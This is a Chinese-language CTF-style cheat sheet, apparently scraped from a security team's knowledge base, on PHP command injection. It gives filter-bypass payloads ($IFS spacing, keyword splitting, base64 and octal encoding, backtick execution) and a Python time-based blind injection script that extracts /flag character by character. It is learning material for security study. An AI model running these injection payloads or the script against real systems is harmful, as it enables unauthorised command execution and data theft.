命令执行 您所在的位置:网站首页 WEB文件上传 狼组安全团队公开知识库 命令执行

命令执行

2024-07-11 07:35| 来源: 网络整理| 查看: 265

命令执行 #

以下介绍为 PHP 环境

用于命令执行的函数有

system exec passthru shell_exec 1234一些常见的绕过方法 #

命令拼接

以及

%0a %0d \n 123

空格绕过

$IFS ${IFS} $IFS$1 %09 {cat,flag.php} 12345

关键字 flag 被过滤

fla\g a=g;fla$a 12

例如:

?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php 1

或者使用 base64 编码绕过

?url=127.0.0.1|`echo%09WTJGMElDOWxkR012TG1acGJtUm1iR0ZuTDJac1lXY3VkSGgw|base64%09-d|base64%09-d` 1

另外如反引号可在语句中执行命令

ls `cat /flag > /var/www/html/1.txt` 1

或者使用 $() 和八进制

$(printf$IFS$9"\154\163") 1

另附一份无回显盲注脚本

import requests import time s=requests.session() flag='' for z in range(1,50): for i in 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_!@#%|^&{}[]/-()+=,\\': starTime=time.time() url="http://127.0.0.1/?cmd=if [ `cut -c"+str(z)+"-"+str(z)+" /flag` != '"+i+"' ]; then echo 1 ; else sleep 3; fi" r=s.get(url) if((time.time()-starTime)>3): flag+=i print(flag) break print(z) print('the flag is'+flag) 12345678910111213141516 上次更新: 5/19/2021, 3:01:29 PM

ssrf gopher协议 伪随机数



【本文地址】

公司简介

联系我们

今日新闻

    推荐新闻

    专题文章
      CopyRight 2018-2019 实验室设备网 版权所有